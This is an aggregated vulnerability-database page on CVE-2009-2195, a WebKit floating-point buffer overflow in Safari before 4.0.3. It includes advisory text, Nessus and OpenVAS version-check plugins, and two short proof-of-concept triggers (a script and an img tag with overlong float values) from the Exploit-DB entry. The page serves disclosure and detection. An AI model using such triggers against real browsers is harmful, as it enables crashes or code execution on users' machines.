WebKit Floating Point Number Remote Buffer Overflow Vulnerability
2009-08-11T00:00:00
ID EDB-ID:33164 Type exploitdb Reporter Apple Modified 2009-08-11T00:00:00
Description
WebKit Floating Point Number Remote Buffer Overflow Vulnerability. CVE-2009-2195. Remote exploits for multiple platform
source: http://www.securityfocus.com/bid/36023/info
WebKit is prone to a remote buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.
Versions prior to Apple Safari 4.0.3 are vulnerable; other applications using WebKit may also be affected.
Example 1:
---------
<script>
var Overflow = "31337" + 0.313373133731337313373133731337...;
</script>
---------
Example 2:
---------
<img width=0.3133731337313373133731337... src="31337.jpg">
---------
{"id": "EDB-ID:33164", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WebKit Floating Point Number Remote Buffer Overflow Vulnerability", "description": "WebKit Floating Point Number Remote Buffer Overflow Vulnerability. CVE-2009-2195. Remote exploits for multiple platform", "published": "2009-08-11T00:00:00", "modified": "2009-08-11T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/33164/", "reporter": "Apple", "references": [], "cvelist": ["CVE-2009-2195"], "lastseen": "2016-02-03T18:36:20", "viewCount": 3, "enchantments": {"score": {"value": 8.1, "vector": "NONE", "modified": "2016-02-03T18:36:20", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-2195"]}, {"type": "saint", "idList": ["SAINT:361D4B6AB8419D0284ED90E09DE23C1A", "SAINT:FE6436803A9F3E821D02CAEFCB83101E", "SAINT:EE860A9DCAE7F0017885A12470B7F966"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900912", "OPENVAS:900912"]}, {"type": "nessus", "idList": ["SUSE_11_3_LIBWEBKIT-110104.NASL", "MACOSX_SAFARI4_0_3.NASL", "SAFARI_4_0_3.NASL", "SUSE_11_2_LIBWEBKIT-110111.NASL"]}], "modified": "2016-02-03T18:36:20", "rev": 2}, "vulnersScore": 8.1}, "sourceHref": "https://www.exploit-db.com/download/33164/", "sourceData": "source: http://www.securityfocus.com/bid/36023/info\r\n\r\nWebKit is prone to a remote buffer-overflow vulnerability.\r\n\r\nAn attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.\r\n\r\nVersions prior to Apple Safari 4.0.3 are vulnerable; other applications using WebKit may also be affected. \r\n\r\n\r\nExample 1:\r\n---------\r\n<script>\r\nvar Overflow = \"31337\" + 0.313373133731337313373133731337...;\r\n</script>\r\n---------\r\n\r\nExample 2:\r\n---------\r\n<img width=0.3133731337313373133731337... src=\"31337.jpg\">\r\n--------- ", "osvdbidlist": ["56988"]}
{"cve": [{"lastseen": "2020-12-09T19:31:20", "description": "Buffer overflow in WebKit in Apple Safari before 4.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted floating-point numbers.", "edition": 5, "cvss3": {}, "published": "2009-08-12T19:30:00", "title": "CVE-2009-2195", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-2195"], "modified": "2011-02-17T06:44:00", "cpe": ["cpe:/a:apple:safari:1.1", "cpe:/a:apple:safari:3.0.2", "cpe:/a:apple:safari:3.2.1", "cpe:/a:apple:safari:2.0", "cpe:/a:apple:safari:3.0.3", "cpe:/a:apple:safari:1.3", "cpe:/a:apple:safari:3", "cpe:/a:apple:safari:3.0.3b", "cpe:/a:apple:safari:1.0.3", "cpe:/a:apple:safari:1.0.0b2", "cpe:/a:apple:safari:1.2.1", "cpe:/a:apple:safari:4beta", "cpe:/a:apple:safari:3.1.0", "cpe:/a:apple:safari:4.0.1", "cpe:/a:apple:safari:3.0.1", "cpe:/a:apple:safari:2.0.4_419.3", "cpe:/a:apple:safari:1.2.2", "cpe:/a:apple:safari:2.0.3_417.9.3", "cpe:/a:apple:safari:0.9", "cpe:/a:apple:safari:2.0.4", "cpe:/a:apple:safari:3.2.0", "cpe:/a:apple:safari:1.1.0", "cpe:/a:apple:safari:1.2", "cpe:/a:apple:safari:3.2", "cpe:/a:apple:safari:4.0.2", "cpe:/a:apple:safari:2.0_pre", "cpe:/a:apple:safari:1.1.1", "cpe:/a:apple:safari:1.2.5", "cpe:/a:apple:safari:0.8", "cpe:/a:apple:safari:1.0.0", "cpe:/a:apple:safari:1.2.0", "cpe:/a:apple:safari:4.0", "cpe:/a:apple:safari:1.2.4", "cpe:/a:apple:safari:4.0_beta", "cpe:/a:apple:safari:3.0.0", "cpe:/a:apple:safari:1.3.2", "cpe:/a:apple:safari:3.1.1", "cpe:/a:apple:safari:1.0", "cpe:/a:apple:safari:1.0.2", "cpe:/a:apple:safari:2.0.3", "cpe:/a:apple:safari:1.3.0", "cpe:/a:apple:safari:3.0.4b", "cpe:/a:apple:safari:3.0.0b", "cpe:/a:apple:safari:3.0.4_beta", "cpe:/a:apple:safari:1.0.0b1", "cpe:/a:apple:safari:3.0.1b", "cpe:/a:apple:safari:1.3.1", "cpe:/a:apple:safari:beta2", "cpe:/a:apple:safari:3.0.2b", "cpe:/a:apple:safari:3.0", "cpe:/a:apple:safari:3.1.2", "cpe:/a:apple:safari:3.1.0b", "cpe:/a:apple:safari:1.0.1", "cpe:/a:apple:safari:3.1", "cpe:/a:apple:safari:2.0.0", "cpe:/a:apple:safari:2.0.2", "cpe:/a:apple:safari:1.2.3", "cpe:/a:apple:safari:3.2.2", "cpe:/a:apple:safari:3.0.4", "cpe:/a:apple:safari:2.0.1"], "id": "CVE-2009-2195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2195", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apple:safari:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0_pre:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.3b:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0.3_417.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0.4_419.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.4_beta:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.1b:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0.3:417.9.3:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.3.2:312.5:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.0b:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.1:beta:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.0.0b2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0.3:417.9.2:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.3.2:312.6:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.2b:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0_beta:528.16:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0:beta:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4beta:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.0.0b1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:beta2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.4b:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0.3:417.9:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.0:beta:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:2.0.3:417.8:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.0.3:85.8.1:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.1.0b:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:1.0.3:85.8:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:3.0.3:522.15.5:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2195"], "description": "Added: 09/16/2009 \nCVE: [CVE-2009-2195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2195>) \nBID: [36023](<http://www.securityfocus.com/bid/36023>) \nOSVDB: [56988](<http://www.osvdb.org/56988>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. Safari is built upon the [WebKit](<http://webkit.org/>) browser engine. \n\n### Problem\n\nA buffer overflow vulnerability in WebKit allows command execution when a user loads a page which contains a specially crafted floating point number. \n\n### Resolution\n\n[Upgrade](<http://www.apple.com/safari/download/>) to Safari 4.0.3 or higher. \n\n### References\n\n<http://support.apple.com/kb/HT3733> \n\n\n### Limitations\n\nExploit works on Safari 4.0.2 and requires a user to load the exploit page. \n\nAfter the page is loaded, there may be a delay before the exploit succeeds. \n\n### Platforms\n\nWindows XP \nMac OS X 10.4 \n \n\n", "edition": 1, "modified": "2009-09-16T00:00:00", "published": "2009-09-16T00:00:00", "id": "SAINT:FE6436803A9F3E821D02CAEFCB83101E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/safari_webkit_floating_point", "type": "saint", "title": "Safari WebKit floating point number buffer overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2195"], "edition": 2, "description": "Added: 09/16/2009 \nCVE: [CVE-2009-2195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2195>) \nBID: [36023](<http://www.securityfocus.com/bid/36023>) \nOSVDB: [56988](<http://www.osvdb.org/56988>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. Safari is built upon the [WebKit](<http://webkit.org/>) browser engine. \n\n### Problem\n\nA buffer overflow vulnerability in WebKit allows command execution when a user loads a page which contains a specially crafted floating point number. \n\n### Resolution\n\n[Upgrade](<http://www.apple.com/safari/download/>) to Safari 4.0.3 or higher. \n\n### References\n\n<http://support.apple.com/kb/HT3733> \n\n\n### Limitations\n\nExploit works on Safari 4.0.2 and requires a user to load the exploit page. \n\nAfter the page is loaded, there may be a delay before the exploit succeeds. \n\n### Platforms\n\nWindows XP \nMac OS X 10.4 \n \n\n", "modified": "2009-09-16T00:00:00", "published": "2009-09-16T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/safari_webkit_floating_point", "id": "SAINT:361D4B6AB8419D0284ED90E09DE23C1A", "type": "saint", "title": "Safari WebKit floating point number buffer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:37", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-2195"], "description": "Added: 09/16/2009 \nCVE: [CVE-2009-2195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2195>) \nBID: [36023](<http://www.securityfocus.com/bid/36023>) \nOSVDB: [56988](<http://www.osvdb.org/56988>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. Safari is built upon the [WebKit](<http://webkit.org/>) browser engine. \n\n### Problem\n\nA buffer overflow vulnerability in WebKit allows command execution when a user loads a page which contains a specially crafted floating point number. \n\n### Resolution\n\n[Upgrade](<http://www.apple.com/safari/download/>) to Safari 4.0.3 or higher. \n\n### References\n\n<http://support.apple.com/kb/HT3733> \n\n\n### Limitations\n\nExploit works on Safari 4.0.2 and requires a user to load the exploit page. \n\nAfter the page is loaded, there may be a delay before the exploit succeeds. \n\n### Platforms\n\nWindows XP \nMac OS X 10.4 \n \n\n", "edition": 4, "modified": "2009-09-16T00:00:00", "published": "2009-09-16T00:00:00", "id": "SAINT:EE860A9DCAE7F0017885A12470B7F966", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/safari_webkit_floating_point", "title": "Safari WebKit floating point number buffer overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-02T21:14:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2199", "CVE-2009-2200", "CVE-2009-2196", "CVE-2009-2195"], "description": "This host is installed with Apple Safari Web Browser and is prone\n to multiple vulnerabilities.", "modified": "2017-01-20T00:00:00", "published": "2009-08-19T00:00:00", "id": "OPENVAS:900912", "href": "http://plugins.openvas.org/nasl.php?oid=900912", "type": "openvas", "title": "Apple Safari Multiple Vulnerabilities - Aug09", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_apple_safari_mult_vuln_aug09.nasl 5055 2017-01-20 14:08:39Z teissa $\n#\n# Apple Safari Multiple Vulnerabilities - Aug09\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker execute arbitrary code, bypass\n security restrictions, gain sensitive information and can cause Denial of\n Service.\n Impact Level: System/Application\";\ntag_affected = \"Apple Safari version prior to 4.0.3.\";\ntag_insight = \"- An error in WebKit while parsing malicious floating point numbers can be\n exploited to cause buffer overflows.\n - An unspecified error in the Top Sites feature can be exploited to place a\n malicious web site in the Top Sites view when a user visits a specially\n crafted web page.\n - Incomplete blacklist vulnerability in WebKit can be exploited via\n unspecified homoglyphs.\n - An error in WebKit in the handling of the 'pluginspage' attribute of the\n 'embed' element can be exploited to launch arbitrary file: URLs and obtain\n sensitive information via a crafted HTML document.\";\ntag_solution = \"Upgrade to Safari version 4.0.3\n http://www.apple.com/support/downloads\";\ntag_summary = \"This host is installed with Apple Safari Web Browser and is prone\n to multiple vulnerabilities.\";\n\nif(description)\n{\n script_id(900912);\n script_version(\"$Revision: 5055 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-20 15:08:39 +0100 (Fri, 20 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-08-19 06:49:38 +0200 (Wed, 19 Aug 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-2195\", \"CVE-2009-2196\", \"CVE-2009-2199\",\n \"CVE-2009-2200\");\n script_bugtraq_id(36022, 36023, 36024, 36026);\n script_name(\"Apple Safari Multiple Vulnerabilities - Aug09\");\n script_xref(name : \"URL\" , value : \"http://support.apple.com/kb/HT3733\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/36269/\");\n script_xref(name : \"URL\" , value : \"http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.html\");\n script_xref(name : \"URL\" , value : \"http://securethoughts.com/2009/08/hijacking-safari-4-top-sites-with-phish-bombs\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_require_keys(\"AppleSafari/Version\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nsafariVer = get_kb_item(\"AppleSafari/Version\");\n\nif(!safariVer){\n exit(0);\n}\n\n# Check for Apple Safari Version < 4.0.3 (4.31.9.1)\nif(version_is_less(version:safariVer, test_version:\"4.31.9.1\")){\n security_message(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-03-03T21:01:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2199", "CVE-2009-2200", "CVE-2009-2196", "CVE-2009-2195"], "description": "This host is installed with Apple Safari Web Browser and is prone\n to multiple vulnerabilities.", "modified": "2020-02-28T00:00:00", "published": "2009-08-19T00:00:00", "id": "OPENVAS:1361412562310900912", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900912", "type": "openvas", "title": "Apple Safari Multiple Vulnerabilities - Aug09", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Multiple Vulnerabilities - Aug09\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900912\");\n script_version(\"2020-02-28T13:41:47+0000\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 13:41:47 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-08-19 06:49:38 +0200 (Wed, 19 Aug 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-2195\", \"CVE-2009-2196\", \"CVE-2009-2199\",\n \"CVE-2009-2200\");\n script_bugtraq_id(36022, 36023, 36024, 36026);\n script_name(\"Apple Safari Multiple Vulnerabilities - Aug09\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT3733\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/36269/\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.html\");\n script_xref(name:\"URL\", value:\"http://securethoughts.com/2009/08/hijacking-safari-4-top-sites-with-phish-bombs\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_safari_detect_win_900003.nasl\");\n script_mandatory_keys(\"AppleSafari/Version\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker execute arbitrary code, bypass\n security restrictions, gain sensitive information and can cause Denial of Service.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari version prior to 4.0.3.\");\n\n script_tag(name:\"insight\", value:\"- An error in WebKit while parsing malicious floating point numbers can be\n exploited to cause buffer overflows.\n\n - An unspecified error in the Top Sites feature can be exploited to place a\n malicious web site in the Top Sites view when a user visits a specially crafted web page.\n\n - Incomplete blacklist vulnerability in WebKit can be exploited via unspecified homoglyphs.\n\n - An error in WebKit in the handling of the 'pluginspage' attribute of the\n 'embed' element can be exploited to launch arbitrary file: URLs and obtain\n sensitive information via a crafted HTML document.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Safari version 4.0.3.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari Web Browser and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"4.31.9.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"Safari 4.0.3 (4.31.9.1)\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T03:24:18", "description": "The version of Apple Safari installed on the remote Mac OS X host is\nearlier than 4.0.3. As such, it is potentially affected by several\nissues :\n\n - A vulnerability in WebKit's parsing of floating point\n numbers may allow for remote code execution.\n (CVE-2009-2195)\n\n - A vulnerability in Safari may allow a malicious website to\n be promoted in Safari's Top Sites. (CVE-2009-2196)\n\n - A vulnerability in how WebKit renders a URL with look-\n alike characters could be used to masquerade a website.\n (CVE-2009-2199)\n\n - A vulnerability in WebKit may lead to the disclosure of\n sensitive information. (CVE-2009-2200)", "edition": 26, "published": "2009-08-11T00:00:00", "title": "Mac OS X : Apple Safari < 4.0.3", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2199", "CVE-2009-2200", "CVE-2009-2196", "CVE-2009-2195"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI4_0_3.NASL", "href": "https://www.tenable.com/plugins/nessus/40553", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40553);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/14 1:59:35\");\n\n script_cve_id(\n \"CVE-2009-2195\", \n \"CVE-2009-2196\",\n \"CVE-2009-2199\",\n \"CVE-2009-2200\"\n );\n script_bugtraq_id(36022, 36023, 36024, 36026);\n\n script_name(english:\"Mac OS X : Apple Safari < 4.0.3\");\n script_summary(english:\"Check the Safari SourceVersion\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host contains a web browser that is affected by several\nvulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version of Apple Safari installed on the remote Mac OS X host is\nearlier than 4.0.3. As such, it is potentially affected by several\nissues :\n\n - A vulnerability in WebKit's parsing of floating point\n numbers may allow for remote code execution.\n (CVE-2009-2195)\n\n - A vulnerability in Safari may allow a malicious website to\n be promoted in Safari's Top Sites. (CVE-2009-2196)\n\n - A vulnerability in how WebKit renders a URL with look-\n alike characters could be used to masquerade a website.\n (CVE-2009-2199)\n\n - A vulnerability in WebKit may lead to the disclosure of\n sensitive information. (CVE-2009-2200)\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://support.apple.com/kb/HT3733\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://lists.apple.com/archives/security-announce/2009/Aug/msg00002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://www.securityfocus.com/advisories/17616\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Apple Safari 4.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119, 200);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n \n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n \n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/uname\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nuname = get_kb_item_or_exit(\"Host/uname\");\nif (!egrep(pattern:\"Darwin.* (8\\.|9\\.[0-8]\\.)\", string:uname)) audit(AUDIT_OS_NOT, \"Mac OS X 10.4 / 10.5\");\n\n\nget_kb_item_or_exit(\"MacOSX/Safari/Installed\");\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"4.0.3\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Installed version : ' + version + \n '\\n Fixed version : ' + fixed_version + '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Safari\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:31:20", "description": "The version of Safari installed on the remote Windows host is earlier\nthan 4.0.3. Such versions are potentially affected by several\nissues :\n\n - A buffer overflow exists in the handling of EXIF\n metadata that ccould lead to a crash or 